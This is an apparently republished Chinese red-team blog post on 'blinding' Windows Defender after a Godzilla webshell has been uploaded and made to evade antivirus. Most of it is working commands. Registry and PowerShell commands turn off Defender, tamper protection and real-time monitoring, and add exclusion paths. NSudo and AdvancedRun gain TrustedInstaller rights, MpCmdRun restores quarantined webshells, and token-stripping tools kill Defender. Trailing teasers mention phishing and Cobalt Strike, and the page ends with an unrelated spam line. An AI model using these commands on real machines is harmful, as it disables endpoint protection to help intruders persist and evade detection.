<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    紅藍對抗之致盲 Windows defender

    VSole2022-11-29 09:58:28

    Windows defender 介紹

    Microsoft Defender 防病毒軟件在 Windows 10 和 Windows 11 以及 Windows Server 版本中可用。

    Microsoft Defender 防病毒軟件是 Microsoft Defender for Endpoint 中下一代保護的主要組件。這種保護將機器學習、大數據分析、深入的威脅防御研究和 Microsoft 云基礎設施結合在一起,以保護您組織中的設備(或端點)。Microsoft Defender 防病毒軟件內置于 Windows 中,它與 Microsoft Defender for Endpoint 配合使用,為你的設備和云提供保護。

    Windows defender 環境

    版本

    Windows Server 系統環境

    • 用戶:Administrator
    • 版本:Windows Server 2019

    補丁

    systeminfo 信息

    事前準備

    在實戰環境中,首先需要上傳webshell,所以在此必須免殺webshell

    web環境:phpstudy 8.1.1.3 + apache 2.4.39 + php 7.3.4

    哥斯拉 webshell 免殺

    工具地址:https://github.com/BeichenDream/Godzilla

    經過測試,用Godzilla自帶的PHP_XOR_BASE64加密器即可免殺(php一句話直接殺)

    生成 PHP_XOR_BASE64 webshell

    靜態免殺測試

    連接webshell

    動態免殺測試

    基礎命令介紹

    cmd

    #查看排除項reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s#查看版本dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b#查看篡改保護(返回結果中的 數值5代表開啟,數值4代表關閉)reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"
    #需要TrustedInstaller權限##cmd注冊表關閉Windows defenderreg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f##cmd關閉篡改保護NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /d 4 /t REG_DWORD /f"##cmd注冊表恢復Windows defenderreg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f##cmd添加Windows defender排除項reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG
    


    powershell

    #查看排除項Get-MpPreference | select ExclusionPath
    #關閉Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true
    #增加排除項Add-MpPreference -ExclusionPath "c:\temp"
    #刪除排除項Remove-MpPreference -ExclusionPath "C:\test"
    #關閉實時保護Set-MpPreference -DisableRealtimeMonitoring $true
    

    關閉 Windows defender

    TrustedInstaller

    TrustedInstaller是從Windows Vista開始出現的一個內置安全主體,在Windows中擁有修改系統文件權限,本身是一個服務,以一個賬戶組的形式出現。

    它的全名是:NT SERVICE\TrustedInstaller

    為什么要獲取TrustedInstaller權限?

    說白了就是因為Administratior權限system權限無法關閉 Windows defender

    注意:以下工具技巧皆需要Administratior權限才能成功使用

    NSudoLG

    工具地址:https://github.com/M2Team/NSudo

    下載后使用:D:\Documents\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe

    免殺測試

    使用方法

    注意:此工具的 -U:T 參數是獲取了 TrustedInstaller 權限

    #cmd注冊表關閉Windows defenderreg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f#cmd注冊表恢復Windows defenderreg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f#cmd添加Windows defender排除項reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f
    #NSudoLG.exe關閉Windows defenderNSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f"#NSudoLG.exe恢復Windows defenderNSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f"#NSudoLG.exe添加Windows defender排除項NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\
    

    powershell成功上線

    AdvancedRun

    地址:https://www.nirsoft.net/utils/advanced_run.html

    免殺測試

    使用方法

    AdvancedRun.exe /EXEFilename "%windir%\system32\cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run
    

    powershell成功上線

    StopDefender

    Github地址:https://github.com/lab52io/StopDefender

    免殺測試

    使用方法

    StopDefender_x64.exe
    

    powershell成功上線

    powershell

    #查看排除項Get-MpPreference | select ExclusionPath
    #關閉Windows defenderSet-MpPreference -DisableRealTimeMonitoring $true
    #增加排除項Add-MpPreference -ExclusionPath "c:\temp"
    #刪除排除項Remove-MpPreference -ExclusionPath "C:\test"
    

    關閉 Windows defender

    關閉 實時保護

    Set-MpPreference -DisableRealtimeMonitoring $true
    

    其他技巧

    MpCmdRun恢復被隔離的文件

    MpCmdRun介紹

    配置和管理 Microsoft Defender 防病毒軟件的命令行工具

    詳情

    https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus?view=o365-worldwide

    尋找MpCmdRun位置

    MpCmdRun的位置為:

    C:\ProgramData\Microsoft\Windows Defender\Platform\

    #查看版本(查看)dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b
    #驗證dir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\" | findstr MpCmdRun
    

    基礎命令

    #查看被隔離的文件列表MpCmdRun -Restore -ListAll
    #恢復指定名稱的文件至原目錄MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php
    #恢復所有文件至原目錄MpCmdRun -Restore -All
    #查看指定路徑是否位于排除列表中MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\
    

    移除Token導致Windows Defender失效

    Windows Defender進程為MsMpEng.exe,MsMpEng.exe是一個受保護的進程(Protected Process Light,簡寫為PPL)

    非 PPL 進程無法獲取 PPL 進程的句柄,導致我們無法直接結束 PPL 進程 MsMpEng.exe, 但是我們能夠以 SYSTEM 權限運行的線程修改進程 MsMpEng.exe 的 token, 當我們移除進程 MsMpEng.exe 的所有 token 后,進程 MsMpEng.exe 無法訪問其他進程的資源,也就無法檢測其他進程是否有害,最終導致 Windows Defender 失效。

    本人沒有利用成功過

    工具地址

    https://github.com/pwn1sher/KillDefenderhttps://github.com/Octoberfest7/KillDefenderhttps://github.com/Octoberfest7/KDStab
    

    參考文章

    https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGwhttps://zhuanlan.zhihu.com/p/538571344https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defenderhttps://cloud.tencent.com/developer/article/1870239
    
    免殺cmd命令
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    Goby 可以快速準確的掃描資產,并直觀呈現出來。同時經過上次 EXP 計劃過后,PoC&EXP 也增加了許多。在實戰化漏洞掃描后,對于高危漏洞的利用,不僅僅只在 whoami 上,而是要進入后滲透階段,那么對于 Windows 機器而言,上線 CS 是必不可少的操作,會讓后滲透如魚得水。此插件只運用了簡單的利用方式上線 CS,希望師傅們能夠提供想法和建議把它更為完善,源碼中有詳細的...
    Windows命令混淆
    2021-09-18 08:53:14
    windows命令混淆最近有些朋友問我一些問題,由于個人技術有限,對靜態有些了解(動態真的不會,
    大家好,這里是 花指令安全實驗室 的第 10?篇文章,本公眾號主攻AD域滲透與各種姿勢的研究,不定時更新!請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關!如何應對面試官最喜歡問的域管與域控定位問題?今天給大家做個總結,無論是實戰還是面試都能給各位有所幫助。對域管的定位01cmd命令定位net group "Domain Admins" /domain ?
    1、文檔連接釣魚 1)LINK鏈接釣魚 2)LINK快捷方式釣魚 3)CHM文檔釣魚 CHM文檔bypass waf 4)HTA釣魚 5)宏釣魚 宏釣魚 bypass waf 6)OLE(Object Linking and Embedding,對象鏈接與嵌入) 7)嵌入JS元素 8)利用模板文件注入宏指令 9)CVE 2、偽造界面釣魚 1)PPT動
    近期,伏影實驗室捕捉到多個以護照掃描文件作為誘餌的網絡釣魚活動。經過分析,我們確認該活動來自APT組織Evilnum,是其長期以來針對金融目標犯罪活動的延續。Evilnum攻擊者在本次釣魚活動中構建了新型攻擊流程,并通過NSIS包裝、簽名、隱寫術等操作實現,最終投遞一種新型木馬程序AgentVX,展現了較高技術水平。
    https://www.freebuf.com/sectool/389399.html
    窮則社工釣魚,達則0day炸場-微步在線,借用微步公眾號的一句話,沒有后端資源支持的情況下,社工釣魚必學技能,畢竟正面打不動,代碼審不動,0day又沒有是日常,下文講解自己對于社工釣魚的思路。
    Web安全-一句話木馬
    2022-07-27 06:43:56
    概述在很多的滲透過程中,滲透人員會上傳一句話木馬到目前web服務目錄繼而提權獲取系統權限,不論asp、php、jsp、aspx都是如此,那么一句話木馬到底是什么呢?
    System權限是在數據庫中,為了方便接下來的滲透,思路是將System權限上線到CobaltStrike上,在此處執行了從自己的VPS上下載殺木馬并執行的操作,顯示執行成功,但并未上線。猜測這是臺阿里云的ECS,對出站端口進行了限制,所以反彈不回來。這樣才算是完全控制了這臺云服務器。于是重新生成了木馬,再次在Navicat里執行,它居然上線了!
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类